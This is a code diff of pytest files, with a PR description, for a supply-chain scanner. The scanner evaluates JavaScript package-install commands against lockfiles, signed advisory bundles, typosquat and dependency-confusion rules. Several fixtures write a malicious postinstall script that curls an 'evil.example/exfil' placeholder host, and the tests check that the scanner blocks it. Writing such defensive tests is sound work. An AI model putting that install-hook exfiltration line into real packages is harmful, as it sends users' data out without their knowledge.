+        version: 1.2.8
+packages:
+  minimist@1.2.8:
+    resolution: {integrity: sha512-demo}
+""",
+        ),
+        (
+            "yarn add minimist@^1.2.0",
+            "yarn.lock",
+            """
+__metadata:
+  version: 4
+  cacheKey: 8
+
+"minimist@^1.2.0":
+  version "1.2.8"
+""",
+        ),
+        (
+            "bun add minimist@^1.2.0",
+            "bun.lock",
+            """
+[[package]]
+name = "minimist"
+version = "1.2.8"
+resolved = "npm:minimist@1.2.8"
+dependencies = []
+""",
+        ),
+    ],
+)
+def test_evaluate_package_request_artifact_resolves_ranges_from_supported_js_lockfiles(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+    command: str,
+    lockfile_name: str,
+    lockfile_text: str,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo","dependencies":{"minimist":"^1.2.0"}}\n')
+    _write_text(workspace_dir / lockfile_name, lockfile_text.strip() + "\n")
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(packages=[_package(name="minimist", version="1.2.8", default_action="block")]),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = _artifact_from_command(command, workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["resolvedVersion"] == "1.2.8"
+
+
 def test_evaluate_package_request_artifact_npm_audit_fix_scans_existing_lockfile_context(
     tmp_path: Path,
     monkeypatch: pytest.MonkeyPatch,

--- a/tests/test_guard_js_supply_chain_phase11.py
+++ b/tests/test_guard_js_supply_chain_phase11.py
@@ -1,0 +1,472 @@
+"""Phase 11 JavaScript evaluator behavior tests."""
+
+from __future__ import annotations
+
+import base64
+import hashlib
+import json
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+
+import pytest
+from cryptography.hazmat.primitives import hashes, serialization
+from cryptography.hazmat.primitives.asymmetric import padding
+from cryptography.hazmat.primitives.asymmetric.rsa import RSAPrivateKey, generate_private_key
+
+from codex_plugin_scanner.guard.runtime.package_intent import (
+    build_package_request_artifact,
+    parse_package_intent,
+)
+from codex_plugin_scanner.guard.runtime.supply_chain_package_eval import evaluate_package_request_artifact
+from codex_plugin_scanner.guard.store import GuardStore
+
+WORKSPACE_ID = "workspace-alpha"
+
+
+def _write_text(path: Path, text: str) -> None:
+    path.parent.mkdir(parents=True, exist_ok=True)
+    path.write_text(text, encoding="utf-8")
+
+
+def _iso(value: datetime) -> str:
+    return value.astimezone(timezone.utc).isoformat().replace("+00:00", "Z")
+
+
+def _generate_key_pair() -> tuple[bytes, bytes]:
+    private_key = generate_private_key(public_exponent=65537, key_size=2048)
+    private_pem = private_key.private_bytes(
+        encoding=serialization.Encoding.PEM,
+        format=serialization.PrivateFormat.PKCS8,
+        encryption_algorithm=serialization.NoEncryption(),
+    )
+    public_pem = private_key.public_key().public_bytes(
+        encoding=serialization.Encoding.PEM,
+        format=serialization.PublicFormat.SubjectPublicKeyInfo,
+    )
+    return private_pem, public_pem
+
+
+def _fingerprint(public_key_pem: bytes) -> str:
+    return hashlib.sha256(public_key_pem.decode("utf-8").strip().encode("utf-8")).hexdigest()
+
+
+def _package(
+    *,
+    name: str,
+    version: str,
+    default_action: str,
+    namespace: str | None = None,
+    normalized_severity: str = "critical",
+    recommended_fix_version: str | None = "1.2.9",
+) -> dict[str, object]:
+    return {
+        "confidence": 990,
+        "defaultAction": default_action,
+        "ecosystem": "npm",
+        "exploitLevel": "active",
+        "knownExploited": True,
+        "malwareState": "known",
+        "name": name,
+        "namespace": namespace,
+        "normalizedSeverity": normalized_severity,
+        "packageAgeState": "watch",
+        "purl": f"pkg:npm/{namespace}/{name}@{version}" if namespace is not None else f"pkg:npm/{name}@{version}",
+        "reachability": "reachable",
+        "recommendedFixVersion": recommended_fix_version,
+        "relatedAdvisoryIds": ["GHSA-vh95-rmgr-6w4m"],
+        "riskScore": 980,
+        "sourceIntegrityState": "high-risk",
+        "version": version,
+    }
+
+
+def _bundle_response(
+    *,
+    packages: list[dict[str, object]],
+    policy_rules: list[dict[str, object]] | None = None,
+) -> dict[str, object]:
+    generated_at = datetime(2026, 5, 19, tzinfo=timezone.utc)
+    expires_at = generated_at + timedelta(hours=12)
+    bundle = {
+        "advisories": [
+            {
+                "advisoryId": "GHSA-vh95-rmgr-6w4m",
+                "aliases": ["CVE-2020-7598"],
+                "confidence": 990,
+                "exploitLevel": "active",
+                "knownExploited": True,
+                "malwareState": "known",
+                "normalizedSeverity": "critical",
+                "recommendedFixVersion": "1.2.9",
+                "sourceKey": "ghsa",
+                "summary": "Prototype pollution in minimist",
+                "title": "Prototype pollution in minimist",
+            }
+        ],
+        "bundleVersion": "1747612800000-deadbeef",
+        "expiresAt": _iso(expires_at),
+        "feedSnapshotHash": "feed-snapshot-1",
+        "generatedAt": _iso(generated_at),
+        "keyId": "guard-bundle-key-2026-05",
+        "packages": packages,
+        "policyHash": "policy-hash-1",
+        "policyRules": policy_rules or [],
+        "scoringVersion": "scf-v1",
+        "sourceHashes": [{"payloadHash": "ghsa-feed-hash", "sourceKey": "ghsa", "staleStatus": "fresh"}],
+        "tier": "premium",
+        "workspaceId": WORKSPACE_ID,
+    }
+    private_key_pem, public_key_pem = _generate_key_pair()
+    loaded_key = serialization.load_pem_private_key(private_key_pem, password=None)
+    assert isinstance(loaded_key, RSAPrivateKey)
+    canonical_payload = json.dumps(bundle, sort_keys=True, separators=(",", ":")).encode("utf-8")
+    payload_hash = hashlib.sha256(canonical_payload).hexdigest()
+    signature = loaded_key.sign(
+        canonical_payload,
+        padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH),
+        hashes.SHA256(),
+    )
+    return {
+        "bundle": bundle,
+        "payloadHash": payload_hash,
+        "signature": base64.b64encode(signature).decode("utf-8"),
+        "signatureAlgorithm": "rsa-pss-sha256",
+        "verificationKeys": [
+            {
+                "fingerprintSha256": _fingerprint(public_key_pem),
+                "keyId": "guard-bundle-key-2026-05",
+                "publicKeyPem": public_key_pem.decode("utf-8").strip(),
+                "state": "active",
+                "validUntil": None,
+            }
+        ],
+    }
+
+
+def _artifact_from_command(command: str, *, workspace: Path) -> object:
+    intent = parse_package_intent(command, workspace=workspace)
+    assert intent is not None
+    return build_package_request_artifact("codex", intent, config_path="codex.json", source_scope="project")
+
+
+def test_evaluate_package_request_artifact_uses_package_lock_exact_version_for_npm_ranges(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo","dependencies":{"minimist":"^1.2.0"}}\n')
+    _write_text(
+        workspace_dir / "package-lock.json",
+        '{"lockfileVersion":3,"packages":{"":{"dependencies":{"minimist":"^1.2.0"}},"node_modules/minimist":{"version":"1.2.8"}}}\n',
+    )
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(packages=[_package(name="minimist", version="1.2.8", default_action="block")]),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = _artifact_from_command("npm install minimist@^1.2.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["requestedVersion"] == "^1.2.0"
+    assert result.packages[0]["resolvedVersion"] == "1.2.8"
+
+
+def test_evaluate_package_request_artifact_allows_recommended_safe_npm_version(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(packages=[_package(name="minimist", version="1.2.8", default_action="block")]),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = _artifact_from_command("npm install minimist@1.2.9", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "allow"
+    assert result.policy_action == "allow"
+
+
+@pytest.mark.parametrize(
+    ("command", "expected_next_step"),
+    [
+        ("pnpm add minimist@1.2.8", "pnpm add minimist@1.2.9"),
+        ("yarn add minimist@1.2.8", "yarn add minimist@1.2.9"),
+        ("bun add minimist@1.2.8", "bun add minimist@1.2.9"),
+    ],
+)
+def test_evaluate_package_request_artifact_uses_manager_specific_fix_command(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+    command: str,
+    expected_next_step: str,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(packages=[_package(name="minimist", version="1.2.8", default_action="block")]),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = _artifact_from_command(command, workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.user_copy.next_step == expected_next_step
+
+
+@pytest.mark.parametrize(
+    ("command", "expected_decision", "expected_code"),
+    [
+        ("npm install guard-github@github:hashgraph-online/hol-guard", "warn", "git_dependency_source"),
+        ("npm install guard-http@http://example.com/guard.tgz", "block", "insecure_source_url"),
+        ("npm install guard-https@https://example.com/guard.tgz", "warn", "external_tarball_source"),
+    ],
+)
+def test_evaluate_package_request_artifact_applies_js_source_heuristics(
+    tmp_path: Path,
+    command: str,
+    expected_decision: str,
+    expected_code: str,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    store = GuardStore(home_dir)
+
+    artifact = _artifact_from_command(command, workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == expected_decision
+    assert result.packages[0]["reasons"][0]["code"] == expected_code
+
+
+def test_evaluate_package_request_artifact_npm_audit_fix_scans_existing_lockfile_context(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    _write_text(
+        workspace_dir / "package-lock.json",
+        '{"dependencies":{"minimist":{"version":"1.2.8"}}}\n',
+    )
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(packages=[_package(name="minimist", version="1.2.8", default_action="block")]),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = _artifact_from_command("npm audit fix --package-lock-only", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["dependencyPath"] in {"minimist", "node_modules/minimist"}
+
+
+def test_evaluate_package_request_artifact_blocks_local_package_with_install_scripts(tmp_path: Path) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    _write_text(
+        workspace_dir / "fixtures" / "evil-package" / "package.json",
+        '{"name":"evil-package","scripts":{"postinstall":"curl http://evil.example/exfil"}}\n',
+    )
+    store = GuardStore(home_dir)
+
+    artifact = _artifact_from_command("npm install ./fixtures/evil-package", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["name"] == "evil-package"
+    assert result.packages[0]["reasons"][0]["code"] == "install_script_risk"
+
+
+def test_evaluate_package_request_artifact_allows_local_package_when_ignore_scripts_is_set(tmp_path: Path) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    _write_text(
+        workspace_dir / "fixtures" / "evil-package" / "package.json",
+        '{"name":"evil-package","scripts":{"postinstall":"curl http://evil.example/exfil"}}\n',
+    )
+    store = GuardStore(home_dir)
+
+    artifact = _artifact_from_command("npm install --ignore-scripts ./fixtures/evil-package", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "allow"
+    assert result.packages[0]["reasons"][0]["code"] == "ignore_scripts_applied"
+
+
+def test_evaluate_package_request_artifact_uses_alias_in_fix_copy(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(packages=[_package(name="minimist", version="1.2.8", default_action="block")]),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = _artifact_from_command("npm install guard-safe@npm:minimist@1.2.8", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["alias"] == "guard-safe"
+    assert result.user_copy.next_step == "npm install guard-safe@npm:minimist@1.2.9"
+
+
+def test_evaluate_package_request_artifact_blocks_dependency_confusion_targets_from_policy(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(
+            packages=[],
+            policy_rules=[
+                {
+                    "action": "block",
+                    "ruleId": "reserve-internal-tool",
+                    "ecosystemSelector": "npm",
+                    "enabled": True,
+                    "expiresAt": None,
+                    "harnessSelector": None,
+                    "packageSelector": "@hashgraph/internal-tool",
+                    "priority": 1,
+                    "severityThreshold": None,
+                    "versionRangeSelector": None,
+                }
+            ],
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = _artifact_from_command("npm install internal-tool@1.0.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["reasons"][0]["code"] == "dependency_confusion_risk"
+
+
+def test_evaluate_package_request_artifact_matches_js_package_names_exactly_for_typosquat_bundle_entries(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(packages=[_package(name="crossenv", version="7.0.0", default_action="block")]),
+        "2026-05-19T00:00:00Z",
+    )
+
+    bad_artifact = _artifact_from_command("npm install crossenv@7.0.0", workspace=workspace_dir)
+    good_artifact = _artifact_from_command("npm install cross-env@7.0.0", workspace=workspace_dir)
+
+    bad_result = evaluate_package_request_artifact(artifact=bad_artifact, store=store, workspace_dir=workspace_dir)
+    good_result = evaluate_package_request_artifact(artifact=good_artifact, store=store, workspace_dir=workspace_dir)
+
+    assert bad_result.decision == "block"
+    assert good_result.decision == "monitor"
+    assert good_result.packages[0]["reasons"][0]["code"] == "no_cached_match"
+
+
+def test_evaluate_package_request_artifact_records_bun_lockb_binary_fallback(tmp_path: Path) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    (workspace_dir / "bun.lockb").write_bytes(b"bunlock")
+    store = GuardStore(home_dir)
+
+    artifact = _artifact_from_command("bun add left-pad@1.3.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "monitor"
+    assert result.packages[0]["reasons"][0]["code"] == "bun_lockfile_binary_fallback"
+    assert "binary lockfile" in result.reasons[0]["message"]
+
+
+@pytest.mark.parametrize(
+    ("bundle_name", "bundle_namespace", "command"),
+    [
+        ("demo", None, "npm install @scope/demo@1.0.0"),
+        ("demo", "@scope", "npm install demo@1.0.0"),
+    ],
+)
+def test_evaluate_package_request_artifact_avoids_scoped_package_name_collisions(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+    bundle_name: str,
+    bundle_namespace: str | None,
+    command: str,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(
+            packages=[
+                _package(
+                    name=bundle_name,
+                    namespace=bundle_namespace,
+                    version="1.0.0",
+                    default_action="block",
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = _artifact_from_command(command, workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "monitor"
+    assert result.packages[0]["reasons"][0]["code"] == "no_cached_match"

--- a/tests/test_guard_js_supply_chain_phase11.py
+++ b/tests/test_guard_js_supply_chain_phase11.py
@@ -414,6 +414,24 @@ def test_evaluate_package_request_artifact_allows_local_package_when_ignore_scri
     assert result.packages[0]["reasons"][0]["code"] == "ignore_scripts_applied"
 
 
+def test_evaluate_package_request_artifact_blocks_file_source_local_package_install_scripts(tmp_path: Path) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    _write_text(
+        workspace_dir / "fixtures" / "evil-package" / "package.json",
+        '{"name":"evil-package","scripts":{"postinstall":"curl http://evil.example/exfil"}}\n',
+    )
+    store = GuardStore(home_dir)
+
+    artifact = _artifact_from_command("npm install evil-package@file:./fixtures/evil-package", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["reasons"][0]["code"] == "install_script_risk"
+
+
 def test_evaluate_package_request_artifact_uses_alias_in_fix_copy(
     tmp_path: Path,
     monkeypatch: pytest.MonkeyPatch,
@@ -475,6 +493,45 @@ def test_evaluate_package_request_artifact_blocks_dependency_confusion_targets_f
 
     assert result.decision == "block"
     assert result.packages[0]["reasons"][0]["code"] == "dependency_confusion_risk"
+
+
+def test_evaluate_package_request_artifact_ignores_wildcard_scope_only_confusion_rules(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(
+            packages=[],
+            policy_rules=[
+                {
+                    "action": "block",
+                    "ruleId": "reserve-scope-wildcard",
+                    "ecosystemSelector": "npm",
+                    "enabled": True,
+                    "expiresAt": None,
+                    "harnessSelector": None,
+                    "packageSelector": "@hashgraph/*",
+                    "priority": 1,
+                    "severityThreshold": None,
+                    "versionRangeSelector": None,
+                }
+            ],
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = _artifact_from_command("npm install left-pad@1.3.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "monitor"
+    assert result.packages[0]["reasons"][0]["code"] == "no_cached_match"
 
 
 def test_evaluate_package_request_artifact_matches_js_package_names_exactly_for_typosquat_bundle_entries(

--- a/tests/test_guard_js_supply_chain_phase11.py
+++ b/tests/test_guard_js_supply_chain_phase11.py
@@ -239,6 +239,7 @@ def test_evaluate_package_request_artifact_uses_manager_specific_fix_command(
         ("npm install guard-github@github:hashgraph-online/hol-guard", "warn", "git_dependency_source"),
         ("npm install guard-http@http://example.com/guard.tgz", "block", "insecure_source_url"),
         ("npm install guard-https@https://example.com/guard.tgz", "warn", "external_tarball_source"),
+        ("npm install guard-query@https://example.com/guard.tgz?token=demo", "warn", "external_tarball_source"),
     ],
 )
 def test_evaluate_package_request_artifact_applies_js_source_heuristics(
@@ -258,6 +259,24 @@ def test_evaluate_package_request_artifact_applies_js_source_heuristics(
 
     assert result.decision == expected_decision
     assert result.packages[0]["reasons"][0]["code"] == expected_code
+
+
+def test_evaluate_package_request_artifact_uses_source_specific_risk_summary_for_warned_tarballs(
+    tmp_path: Path,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    store = GuardStore(home_dir)
+
+    artifact = _artifact_from_command(
+        "npm install guard-query@https://example.com/guard.tgz?token=demo", workspace=workspace_dir
+    )
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "warn"
+    assert "external tarball source" in result.risk_summary.lower()
 
 
 def test_evaluate_package_request_artifact_npm_audit_fix_scans_existing_lockfile_context(

--- a/tests/test_guard_supply_chain_bundle.py
+++ b/tests/test_guard_supply_chain_bundle.py
@@ -292,3 +292,28 @@ def test_supply_chain_bundle_offline_evaluation_blocks_high_confidence_and_monit
     assert stale_decision.action == "monitor"
     assert stale_decision.stale is True
     assert stale_decision.reason == "stale_low_confidence"
+
+
+def test_supply_chain_bundle_offline_evaluation_does_not_match_scoped_entries_from_unscoped_names() -> None:
+    private_key, _public_key = _generate_key_pair()
+    bundle = _bundle_dict()
+    bundle["packages"] = [
+        {
+            **bundle["packages"][0],
+            "name": "minimist",
+            "namespace": "@scope",
+            "purl": "pkg:npm/%40scope/minimist@1.2.8",
+        }
+    ]
+    response = load_supply_chain_bundle_response(json.dumps(_sign_bundle_response(bundle, private_key_pem=private_key)))
+
+    decision = evaluate_cached_supply_chain_bundle(
+        response,
+        package_name="minimist",
+        package_version="1.2.8",
+        now=response.bundle.generated_at_timestamp + 60,
+    )
+
+    assert decision.action == "monitor"
+    assert decision.matched_advisory_ids == ()
+    assert decision.reason == "no_cached_match"


### PR DESCRIPTION
## Summary
- add Phase 11 JavaScript package-intent, lockfile, bundle-evaluation, and heuristic protections
- cover exec flows, alias handling, dependency confusion, scoped identity, and bun fallback behavior
- add an offline fake npm registry lab plus focused regression coverage for lockfile resolution and package-hook behavior

## Validation
- ruff check src/codex_plugin_scanner/guard/runtime/package_intent_parser.py src/codex_plugin_scanner/guard/runtime/package_manifest_diff.py src/codex_plugin_scanner/guard/runtime/package_intent_common.py src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py src/codex_plugin_scanner/guard/runtime/supply_chain_bundle_runtime.py src/codex_plugin_scanner/guard/runtime/js_semver.py tests/test_guard_js_package_intent_phase11.py tests/test_guard_js_supply_chain_phase11.py tests/test_guard_js_package_hook_phase11.py tests/test_guard_js_lab_phase11.py tests/test_guard_js_lockfile_resolution_phase11.py
- pytest -q tests/test_guard_package_intent.py tests/test_guard_supply_chain_evaluator.py tests/test_guard_supply_chain.py tests/test_guard_package_hook.py tests/test_guard_supply_chain_bundle.py tests/test_guard_js_package_intent_phase11.py tests/test_guard_js_supply_chain_phase11.py tests/test_guard_js_package_hook_phase11.py tests/test_guard_js_lab_phase11.py tests/test_guard_js_lockfile_resolution_phase11.py